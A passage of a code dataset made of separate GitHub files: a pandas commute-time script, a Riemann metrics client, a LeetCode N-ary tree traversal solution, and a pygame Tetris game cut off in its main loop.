{v: k for k, v in us_state_abbrev.items()}\n\n\nstate = []\ncity = []\n\nfor index, row in city_commute_df.iterrows():\n temp1 = row['City']\n temp = temp1.split(', ')\n city.append(temp[0])\n state.append(abbrev_to_state[temp[len(temp) - 1]])\n\ncity_commute_df['City'] = city\ncity_commute_df['state'] = state\nfinal_data_frame = pd.DataFrame()\nfinal_data_frame['City'] = city_commute_df['City']\nfinal_data_frame['State'] = city_commute_df['state']\nfinal_data_frame['Avg Commute Time (minutes)'] = city_commute_df['Avg Commute Time']\ncommute_list = []\nflag = 0\nfor row in commute_times_df.itertuples():\n for row2 in final_data_frame.itertuples():\n temp_city = row2[1]\n temp_state = row2[2]\n temp_amazon_city = str(row[2])\n if ((temp_state == row[1]) and ((temp_city == temp_amazon_city) or (temp_city in temp_amazon_city))):\n commute_list.append(row2[3])\n flag = 1\n break\n if (flag != 1):\n commute_list.append(0)\n flag = 0\n \n\ncommute_times_df['Average Commute Time'] = commute_list \n\ncsv_out = 'D:\\\\Users\\\\Marvin\\\\Google Drive\\\\CSC\\\\CSC495\\\\Amazon Problem\\\\commute_times_amazon_cities.csv'\ncommute_times_df.to_csv(csv_out, sep='|', na_rep='?', \n columns=['state', 'city', 'MSA', 'is_top_twenty', 'Average Commute Time'])\n","repo_name":"ejgillia/csc495_amazon","sub_path":"scripts/pandasFromCSV_commute_times_amazon_cities.py","file_name":"pandasFromCSV_commute_times_amazon_cities.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25145550452","text":"from riemann_client.transport import TCPTransport\nfrom riemann_client.client import QueuedClient\n\nfrom ..rabbitmq.message import Message\nfrom ..consumer.consumer import ConsumerClient\n\n\nclass RiemannClient(ConsumerClient):\n def __init__(self, config):\n self.client = QueuedClient(TCPTransport(config.riemann_host, config.riemann_port))\n self.client.transport.connect()\n\n def recieve_message(self, message):\n for hostname, metrics in message.items():\n for metric in metrics:\n message = Message(**metric)\n self.client.event(service=message.service, metric_f=message.metric, host=hostname)\n\n self.client.flush()\n","repo_name":"chestm007/Chestymetrics","sub_path":"chestymetrics/lib/riemann/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18847647042","text":"#590. N-ary Tree Postorder Traversal\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def postorder(self, root: 'Node') -> List[int]:\n if not root:\n return []\n stack = []\n res =[]\n stack.append(root) \n while stack:\n node = stack.pop() #node = [5]\n res.append(node.val) #res = [1,3,5]\n stack.extend(node.children) #stack = [4,2,6]\n return res[::-1]\n\n #regit cursive way\n # \"\"\"\n # # Definition for a Node.\n # class Node:\n # def __init__(self, val=None, children=None):\n # self.val = val\n # self.children = children\n # \"\"\"\n\n # class Solution:\n # def postorder(self, root: 'Node') -> List[int]:\n\n # res =[]\n # if not root:\n # return res\n # for child in root.children:\n # res.extend(self.postorder(child))\n # res.append(root.val)\n # return res","repo_name":"sebaschen/leetcode","sub_path":"590_N-ary_Tree_Postorder_Traversal.py","file_name":"590_N-ary_Tree_Postorder_Traversal.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"765886614","text":"import pygame\nimport copy\nfrom pygame.locals import *\nfrom sys import exit\nimport random\nfrom threading import Thread\n\npygame.init()\nbackground = './background.jpg'\nrecord_file_path = './record.txt'\nbox = './box.png'\nmusic = './BGM.mp3'\n# 打开文件\nrecord_file = open(record_file_path, 'r')\nrecord_list = eval(record_file.read())\nrecord_file.close()\nok_bg = 0\n\n\nclass Russia(object):\n # 初始化背景\n def init_screen(self):\n self.screen = pygame.display.set_mode([1920, 1080], pygame.FULLSCREEN, 32)\n global ok_bg\n ok_bg = 1\n\n def __init__(self, color=0):\n self.de_color = color\n # 初始化屏幕\n if ok_bg == 0:\n self.init_screen()\n self.bg_picture = pygame.image.load(background).convert()\n self.box_picture = pygame.image.load(box).convert_alpha()\n pygame.mixer_music.load(music)\n pygame.mixer_music.play(loops=100)\n pygame.mixer_music.set_volume(0.3)\n # 初始化字体\n self.my_font = pygame.font.SysFont('kaiti', 30, True, True)\n # 初始化得分\n self.my_count = 0\n # 初始化边界矩形列表\n self.border_fixed_rec = []\n # 初始化第一个块\n self.next_box = self.choice(random.randint(1, 7))\n # 初始化颜色\n if color == 0:\n c = [random.randint(10, 245), random.randint(10, 245), random.randint(10, 245)]\n else:\n c = color\n self.rec_1_next = c\n self.rec_2_next = c\n self.rec_3_next = c\n self.rec_4_next = c\n # 下边界\n for x in range(15):\n self.border_fixed_rec.append([682+x*30, 938, 30, 30])\n # 左右边界\n for y in range(33):\n self.border_fixed_rec.append([651, 9+y*30, 30, 30])\n self.border_fixed_rec.append([1132, 9+y*30, 30, 30])\n # 累积块\n self.accumulate_list = []\n # 暂停键\n self.pause = 0\n # 创建矩形\n self.create_new()\n # 时间标志\n self.time_record = 0\n # 变形次数标志\n self.change_record = 0\n # 游戏结束标志\n self.end = 0\n # 暂停标志\n self.pause = 0\n # 等级\n self.level = 1\n # 重新开始方框和显示格子方框和暂停和打开背景音乐\n self.restart_box = pygame.rect.Rect(1540, 450, 130, 50)\n self.show_lines_box = pygame.rect.Rect(200, 350, 100, 30)\n self.pause_box = pygame.rect.Rect(200, 400, 100, 30)\n self.music_box = pygame.rect.Rect(1550, 600, 100, 30)\n # 显示格子\n self.show_lines = 1\n # RGB颜色\n self.lines_color1 = 255\n self.lines_color2 = 0\n self.lines_color3 = 0\n # 暂停标志\n self.pause = -1\n # 快速下落标志\n self.down_fast = 0\n # 播放音乐标志\n self.stop_music = 0\n self.mix_color = 1\n\n # 变形\n def change(self):\n # 三叉\n if isinstance(self.now_box, Trig):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x = [self.rec_3[0] + 30, self.rec_3[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rect):\n return\n self.rec_3[0] += 30\n self.rec_3[1] += 30\n self.change_record = 1\n elif self.change_record == 1:\n for rect in self.border_fixed_rec:\n next_x = [self.rec_1[0] - 30, self.rec_1[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rect):\n return\n self.rec_1[0] -= 30\n self.rec_1[1] += 30\n self.change_record = 2\n elif self.change_record == 2:\n for rect in self.border_fixed_rec:\n next_x = [self.rec_4[0] - 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rect):\n return\n self.rec_4[0] -= 30\n self.rec_4[1] -= 30\n self.change_record = 3\n else:\n for rect in self.border_fixed_rec:\n next_x = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rect):\n return\n self.rec_1[0] += 30\n self.rec_1[1] -= 30\n self.rec_3[0] -= 30\n self.rec_3[1] -= 30\n self.rec_4[0] += 30\n self.rec_4[1] += 30\n self.change_record = 0\n # 直线\n if isinstance(self.now_box, Beeline):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 30, self.rec_1[1] + 30, 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] + 60, self.rec_4[1] - 60, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 30\n self.rec_1[1] += 30\n self.rec_3[0] += 30\n self.rec_3[1] -= 30\n self.rec_4[0] += 60\n self.rec_4[1] -= 60\n self.change_record = 1\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 30, self.rec_1[1] - 30, 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] - 60, self.rec_4[1] + 60, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 30\n self.rec_1[1] -= 30\n self.rec_3[0] -= 30\n self.rec_3[1] += 30\n self.rec_4[0] -= 60\n self.rec_4[1] += 60\n self.change_record = 0\n # 左直\n if isinstance(self.now_box, LBeeline):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 60, self.rec_1[1], 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 60\n self.rec_3[0] += 30\n self.rec_3[1] -= 30\n self.rec_4[0] -= 30\n self.rec_4[1] += 30\n self.change_record = 1\n elif self.change_record == 1:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0], self.rec_1[1] + 60, 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[1] += 60\n self.rec_3[0] += 30\n self.rec_3[1] += 30\n self.rec_4[0] -= 30\n self.rec_4[1] -= 30\n self.change_record = 2\n elif self.change_record == 2:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 60, self.rec_1[1], 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 60\n self.rec_3[0] -= 30\n self.rec_3[1] += 30\n self.rec_4[0] += 30\n self.rec_4[1] -= 30\n self.change_record = 3\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0], self.rec_1[1] - 60, 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(rect) or \\\n pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[1] -= 60\n self.rec_3[0] -= 30\n self.rec_3[1] -= 30\n self.rec_4[0] += 30\n self.rec_4[1] += 30\n self.change_record = 0\n # 右直\n if isinstance(self.now_box, RBeeline):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0], self.rec_1[1] + 60, 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[1] += 60\n self.rec_3[0] += 30\n self.rec_3[1] -= 30\n self.rec_4[0] -= 30\n self.rec_4[1] += 30\n self.change_record = 1\n elif self.change_record == 1:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 60, self.rec_1[1], 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 60\n self.rec_3[0] += 30\n self.rec_3[1] += 30\n self.rec_4[0] -= 30\n self.rec_4[1] -= 30\n self.change_record = 2\n elif self.change_record == 2:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0], self.rec_1[1] - 60, 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[1] -= 60\n self.rec_3[0] -= 30\n self.rec_3[1] += 30\n self.rec_4[0] += 30\n self.rec_4[1] -= 30\n self.change_record = 3\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 60, self.rec_1[1], 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 60\n self.rec_3[0] -= 30\n self.rec_3[1] -= 30\n self.rec_4[0] += 30\n self.rec_4[1] += 30\n self.change_record = 0\n # 左梯\n if isinstance(self.now_box, LLadder):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 30, self.rec_1[1] + 30, 30, 30]\n next_x2 = [self.rec_3[0] + 60, self.rec_3[1], 30, 30]\n next_x3 = [self.rec_4[0] - 30, self.rec_4[1] + 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 30\n self.rec_1[1] += 30\n self.rec_3[0] += 60\n self.rec_4[0] -= 30\n self.rec_4[1] += 30\n self.change_record = 1\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 30, self.rec_1[1] - 30, 30, 30]\n next_x2 = [self.rec_3[0] - 60, self.rec_3[1], 30, 30]\n next_x3 = [self.rec_4[0] + 30, self.rec_4[1] - 30, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 30\n self.rec_1[1] -= 30\n self.rec_3[0] -= 60\n self.rec_4[0] += 30\n self.rec_4[1] -= 30\n self.change_record = 0\n # 右梯\n if isinstance(self.now_box, RLadder):\n # 判断是否能变形\n if self.change_record == 0:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] + 30, self.rec_1[1] + 30, 30, 30]\n next_x2 = [self.rec_3[0] + 30, self.rec_3[1] - 30, 30, 30]\n next_x3 = [self.rec_4[0], self.rec_4[1] + 60, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] += 30\n self.rec_1[1] += 30\n self.rec_3[0] += 30\n self.rec_3[1] -= 30\n self.rec_4[1] += 60\n self.change_record = 1\n else:\n for rect in self.border_fixed_rec:\n next_x1 = [self.rec_1[0] - 30, self.rec_1[1] - 30, 30, 30]\n next_x2 = [self.rec_3[0] - 30, self.rec_3[1] + 30, 30, 30]\n next_x3 = [self.rec_4[0], self.rec_4[1] - 60, 30, 30]\n if pygame.rect.Rect(next_x1).colliderect(rect) or pygame.rect.Rect(next_x2).colliderect(\n rect) or pygame.rect.Rect(next_x3).colliderect(rect):\n return\n self.rec_1[0] -= 30\n self.rec_1[1] -= 30\n self.rec_3[0] -= 30\n self.rec_3[1] += 30\n self.rec_4[1] -= 60\n self.change_record = 0\n\n # 左右移动\n def transverse(self, how):\n for rec in self.border_fixed_rec:\n for x in self.recs:\n # 判断是否碰壁\n if int(how) == 1:\n next_x = [x[0]-30, x[1], 30, 30]\n else:\n next_x = [x[0]+30, x[1], 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rec):\n return\n for x in self.recs:\n if int(how) == 1:\n x[0] -= 30\n else:\n x[0] += 30\n\n # 下落\n def move_down(self):\n for rec in self.border_fixed_rec:\n for x in self.recs:\n # 判断是否到底\n next_x = [x[0], x[1] + 1, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rec):\n self.fix()\n return\n for x in self.recs:\n x[1] += self.level\n\n # 瞬间下落\n def go_fast(self):\n my_lis = []\n for x in self.recs:\n if x[0] not in my_lis:\n my_lis.append(x[0])\n border_lis = []\n for rec in self.border_fixed_rec:\n if rec[0] in my_lis:\n border_lis.append(rec)\n border_lis.sort()\n con = 0\n while con == 0:\n for rec in border_lis:\n for x in self.recs:\n # 判断是否到底\n next_x = [x[0], x[1] + 1, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rec):\n con = 1\n if con == 0:\n for x in self.recs:\n x[1] += 1\n\n # 模拟瞬间下落\n def virtual_go_fast(self):\n my_lis = []\n for x in self.recs:\n if x[0] not in my_lis:\n my_lis.append(x[0])\n border_lis = []\n for rec in self.border_fixed_rec:\n if rec[0] in my_lis:\n border_lis.append(rec)\n border_lis.sort()\n con = 0\n virtual_recs = copy.deepcopy(self.recs)\n while con == 0:\n for rec in border_lis:\n for x in virtual_recs:\n # 判断是否到底\n next_x = [x[0], x[1] + 1, 30, 30]\n if pygame.rect.Rect(next_x).colliderect(rec):\n con = 1\n for r in virtual_recs:\n pygame.draw.rect(self.screen, [255, 100, 100], [r[0], r[1], 30, 30], 2)\n pygame.draw.line(self.screen, [255, 100, 100], (r[0], r[1]), (r[0] + 30, r[1] + 30), 2)\n pygame.draw.line(self.screen, [255, 100, 100], (r[0] + 30, r[1]), (r[0], r[1] + 30), 2)\n if con == 0:\n for x in virtual_recs:\n x[1] += 1\n\n # 创建新块\n def create_new(self):\n # 随机选择\n self.now_box = self.next_box\n self.next_box = self.choice(random.randint(1, 7))\n # 创建矩形\n self.rec_1 = self.now_box.recs[0]\n self.rec_2 = self.now_box.recs[1]\n self.rec_3 = self.now_box.recs[2]\n self.rec_4 = self.now_box.recs[3]\n # 下一个\n rec_1 = self.next_box.recs[0]\n rec_2 = self.next_box.recs[1]\n rec_3 = self.next_box.recs[2]\n rec_4 = self.next_box.recs[3]\n self.recs = [self.rec_1, self.rec_2, self.rec_3, self.rec_4]\n self.rec_1_color = self.rec_1_next\n self.rec_2_color = self.rec_2_next\n self.rec_3_color = self.rec_3_next\n self.rec_4_color = self.rec_4_next\n if self.de_color == 0:\n c = [random.randint(10, 245), random.randint(10, 245), random.randint(10, 245)]\n else:\n c = self.de_color\n self.rec_1_next = c\n self.rec_2_next = c\n self.rec_3_next = c\n self.rec_4_next = c\n # 创建下一个块\n self.small_1 = [rec_1[0]+690, rec_1[1]+190, 30, 30]\n self.small_2 = [rec_2[0]+690, rec_2[1]+190, 30, 30]\n self.small_3 = [rec_3[0]+690, rec_3[1]+190, 30, 30]\n self.small_4 = [rec_4[0]+690, rec_4[1]+190, 30, 30]\n\n # 选择块\n def choice(self, number):\n if number == 1:\n return Trig()\n elif number == 2:\n return Beeline()\n elif number == 3:\n return LBeeline()\n elif number == 4:\n return RBeeline()\n elif number == 5:\n return Field()\n elif number == 6:\n return LLadder()\n elif number == 7:\n return RLadder()\n\n # 到达底部固定\n def fix(self):\n # 消除误差\n for rect in self.recs:\n rect[1] = (rect[1] // 30) * 30 + 8\n\n # 这四个块加入累计\n self.accumulate_list.append([self.rec_1, self.rec_1_color])\n self.accumulate_list.append([self.rec_2, self.rec_2_color])\n self.accumulate_list.append([self.rec_3, self.rec_3_color])\n self.accumulate_list.append([self.rec_4, self.rec_4_color])\n # 加入边界块\n for rec in self.recs:\n self.border_fixed_rec.append(rec)\n # 判断消除\n lis = [int(self.rec_1[1]), int(self.rec_2[1]), int(self.rec_3[1]), int(self.rec_4[1])]\n li = []\n for x in lis:\n if x not in li:\n li.append(x)\n li.reverse()\n self.eliminate(li)\n # 创建新块\n self.create_new()\n # 还原变形记录\n self.change_record = 0\n\n # 判断消除\n def eliminate(self, lis):\n for y in lis:\n count = 0\n for rec in self.accumulate_list:\n if int(rec[0][1]) == int(y):\n count += 1\n if count == 15:\n # 清除累计\n template = []\n for rect in self.accumulate_list:\n if int(rect[0][1]) != int(y):\n template.append(rect)\n self.accumulate_list = template\n # 清除边界\n template = []\n for rect in self.border_fixed_rec:\n if int(rect[1]) != int(y):\n template.append(rect)\n self.border_fixed_rec = template\n # 加入下边界\n for x in range(21):\n self.border_fixed_rec.append([681 + x * 30, 938, 30, 30])\n # 左右边界\n for c in range(33):\n self.border_fixed_rec.append([651, 9 + c * 30, 30, 30])\n self.border_fixed_rec.append([1282, 9 + c * 30, 30, 30])\n # 上面的下移\n for rect in self.accumulate_list:\n if int(rect[0][1]) < int(y):\n rect[0][1] += 30\n if rect[0][1] % 30 == 7:\n rect[0][1] += 1\n elif rect[0][1] % 30 == 9:\n rect[0][1] -= 1\n # 重新加入检查\n lis.append(y)\n # 得分加1\n self.my_count += 1\n\n # 画出块\n def draw_box(self):\n # 不画超出范围的部分\n if self.rec_1[1] >= 40:\n pygame.draw.rect(self.screen, self.rec_1_color, self.rec_1)\n elif self.rec_1[1] >= 10:\n pygame.draw.rect(self.screen, self.rec_1_color, [self.rec_1[0], 40, 30, abs(-self.rec_1[1] + 10)])\n if self.rec_2[1] >= 40:\n pygame.draw.rect(self.screen, self.rec_2_color, self.rec_2)\n elif self.rec_2[1] >= 10:\n pygame.draw.rect(self.screen, self.rec_2_color, [self.rec_2[0], 40, 30, abs(-self.rec_2[1] + 10)])\n if self.rec_3[1] >= 40:\n pygame.draw.rect(self.screen, self.rec_3_color, self.rec_3)\n elif self.rec_3[1] >= 10:\n pygame.draw.rect(self.screen, self.rec_3_color, [self.rec_3[0], 40, 30, abs(-self.rec_3[1] + 10)])\n if self.rec_4[1] >= 40:\n pygame.draw.rect(self.screen, self.rec_4_color, self.rec_4)\n elif self.rec_4[1] >= 10:\n pygame.draw.rect(self.screen, self.rec_4_color, [self.rec_4[0], 40, 30, abs(-self.rec_4[1] + 10)])\n\n # 显示界面\n def show_info(self):\n font = pygame.font.SysFont('simhei', 20, True, True)\n # 主框\n pygame.draw.rect(self.screen, (50, 10, 200), (680, 40, 454, 900), 3)\n # 显示下一个块的框\n self.screen.blit(self.box_picture, (1430, 70))\n # 显示得分\n text = self.my_font.render('得分 %d' % self.my_count, True, (50, 50, 250))\n self.screen.blit(text, (1530, 350))\n pygame.draw.lines(self.screen, (200, 250, 0), True, [(1510, 340), (1690, 340), (1690, 390), (1510, 390)], 4)\n pygame.draw.lines(self.screen, (self.lines_color1, 0, self.lines_color3), True, [(1510, 340), (1690, 340),\n (1690, 390), (1510, 390)], 2)\n # 显示等级\n font1 = pygame.font.SysFont('songti', 50, True, True)\n text = font1.render(str(self.level), True, (200, 0, 200))\n self.screen.blit(text, (280, 190))\n text = font1.render('level', True, (200, 100, 0))\n self.screen.blit(text, (250, 110))\n pygame.draw.rect(self.screen, [0, 0, 0], [200, 150, 200, 100], 3)\n # 画出累计\n for rec in self.accumulate_list:\n pygame.draw.rect(self.screen, rec[1], rec[0])\n # 画出下一个\n pygame.draw.rect(self.screen, self.rec_1_next, self.small_1)\n pygame.draw.rect(self.screen, self.rec_2_next, self.small_2)\n pygame.draw.rect(self.screen, self.rec_3_next, self.small_3)\n pygame.draw.rect(self.screen, self.rec_4_next, self.small_4)\n # 重新开始选择框\n pygame.draw.rect(self.screen, (150, 10, 200), self.restart_box)\n pygame.draw.rect(self.screen, (0, 150, self.lines_color3), self.restart_box, 2)\n text = font.render('重新开始', True, (255, 255, 250))\n self.screen.blit(text, (1560, 466))\n # 暂停开始音乐框\n pygame.draw.rect(self.screen, (150, 0, 80), self.music_box)\n pygame.draw.rect(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), self.music_box, 2)\n if self.stop_music == 0:\n text = font.render('暂停音乐', True, (255, 255, 255))\n else:\n text = font.render('打开音乐', True, (255, 255, 255))\n self.screen.blit(text, (1555, 605))\n # 显示格子选择框\n pygame.draw.rect(self.screen, (50, 100, 150), self.show_lines_box)\n pygame.draw.rect(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), self.show_lines_box, 2)\n if self.show_lines == -1:\n text = font.render('显示格子', True, (255, 255, 255))\n else:\n text = font.render('隐藏格子', True, (255, 255, 255))\n self.screen.blit(text, (208, 355))\n # 暂停选择框\n pygame.draw.rect(self.screen, (50, 100, 150), self.pause_box)\n pygame.draw.rect(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), self.pause_box, 2)\n font = pygame.font.SysFont('simhei', 20, True, True)\n if self.pause == -1:\n text = font.render('暂停', True, (255, 255, 255))\n else:\n text = font.render('开始', True, (255, 255, 255))\n self.screen.blit(text, (208, 405))\n # 是否画出格子\n if self.show_lines == 1:\n for x in range(14):\n pygame.draw.line(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3),\n (711 + 30*x, 40), (711 + 30*x, 940), 1)\n for y in range(29):\n pygame.draw.line(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), (681, 68+30*y),\n (1132, 68+30*y), 1)\n # 画出排行榜\n # 画出边框\n pygame.draw.lines(self.screen, (250, 20, 50), False, [(400, 450), (400, 500), (160, 500), (160, 550),\n (400, 550), (400, 600), (160, 600), (160, 650)], 2)\n pygame.draw.line(self.screen, (250, 20, 50), (270, 450), (270, 650), 2)\n pygame.draw.lines(self.screen, (self.lines_color1, self.lines_color2, self.lines_color3), True,\n [(160, 450), (400, 450), (400, 650), (160, 650)], 3)\n # 表头和分数\n font = pygame.font.SysFont('fangsong', 25, True, True)\n text = font.render('排名 分数', True, (190, 60, 80))\n self.screen.blit(text, (190, 460))\n text = font.render('第一 %d' % record_list[0], True, (190, 60, 80))\n self.screen.blit(text, (190, 510))\n text = font.render('第二 %d' % record_list[1], True, (190, 60, 80))\n self.screen.blit(text, (190, 560))\n text = font.render('第三 %d' % record_list[2], True, (190, 60, 80))\n self.screen.blit(text, (190, 610))\n if self.level < 15:\n self.level = self.my_count // 5 + 1\n # # 测试:画出边框矩形\n # for rec in self.border_fixed_rec:\n # pygame.draw.rect(self.screen, (200, 0, 100), rec)\n\n # 判断Game Over\n def judge_end(self):\n for rec in self.accumulate_list:\n if rec[0][1] < 50:\n self.end = 1\n # 判断是否破纪录\n if self.my_count > record_list[0]:\n record_list[0], record_list[1], record_list[2] = self.my_count, record_list[0], \\\n record_list[1]\n elif self.my_count > record_list[1]:\n record_list[1], record_list[2] = self.my_count, record_list[1]\n elif self.my_count > record_list[2]:\n record_list[2] = self.my_count\n # 写入文件\n f = open('./record.txt', 'w')\n f.write(str(record_list))\n f.close()\n\n # 改变颜色\n def change_color(self):\n if self.mix_color == 1:\n # 实时改变格子颜色\n # R\n if self.lines_color3 == 255 and self.lines_color2 == 0:\n if self.lines_color1 < 255:\n self.lines_color1 += 3\n else:\n self.lines_color1 = 255\n elif self.lines_color3 == 0 and self.lines_color2 == 255:\n if self.lines_color1 > 0:\n self.lines_color1 -= 3\n else:\n self.lines_color1 = 0\n # G\n if self.lines_color1 == 255 and self.lines_color3 == 0:\n if self.lines_color2 < 255:\n self.lines_color2 += 3\n else:\n self.lines_color2 = 255\n elif self.lines_color1 == 0 and self.lines_color3 == 255:\n if self.lines_color2 > 0:\n self.lines_color2 -= 3\n else:\n self.lines_color2 = 0\n # B\n if self.lines_color1 == 0 and self.lines_color2 == 255:\n if self.lines_color3 < 255:\n self.lines_color3 += 3\n else:\n self.lines_color3 = 255\n elif self.lines_color1 == 255 and self.lines_color2 == 0:\n if self.lines_color3 > 0:\n self.lines_color3 -= 3\n else:\n self.lines_color3 = 0\n # 改变按钮颜色\n font = pygame.font.SysFont('simhei', 20, True, True)\n pos = pygame.mouse.get_pos()\n if self.restart_box.collidepoint(pos[0], pos[1]):\n text = font.render('重新开始', True, (255, 0, 0))\n self.screen.blit(text, (1560, 466))\n elif self.show_lines_box.collidepoint(pos[0], pos[1]):\n if self.show_lines == -1:\n text = font.render('显示格子', True, (0, 0, 255))\n else:\n text = font.render('隐藏格子', True, (0, 0, 255))\n self.screen.blit(text, (208, 355))\n elif self.pause_box.collidepoint(pos[0], pos[1]):\n if self.pause == -1:\n text = font.render('暂停', True, (0, 0, 255))\n else:\n text = font.render('开始', True, (0, 0, 255))\n self.screen.blit(text, (208, 405))\n elif self.music_box.collidepoint(pos[0], pos[1]):\n if self.stop_music == 0:\n text = font.render('暂停音乐', True, (0, 0, 255))\n else:\n text = font.render('打开音乐', True, (0, 0, 255))\n self.screen.blit(text, (1555, 605))\n\n # 主循环\n def began(self):\n while 1:\n self.time_record += 1\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n key_press = pygame.key.get_pressed()\n # alt+f4退出\n if key_press[K_LALT] and key_press[K_F4]:\n pygame.display.quit()\n exit()\n # 移动变形\n if self.pause == -1:\n if key_press[K_LEFT]:\n self.transverse(1)\n if key_press[K_RIGHT]:\n self.transverse(2)\n if key_press[K_UP]:\n self.change()\n if key_press[K_DOWN]:\n Thread(target=self.go_fast).start()\n self.down_fast = 1\n # RALT固定格子\n if key_press[K_RALT]:\n self.mix_color 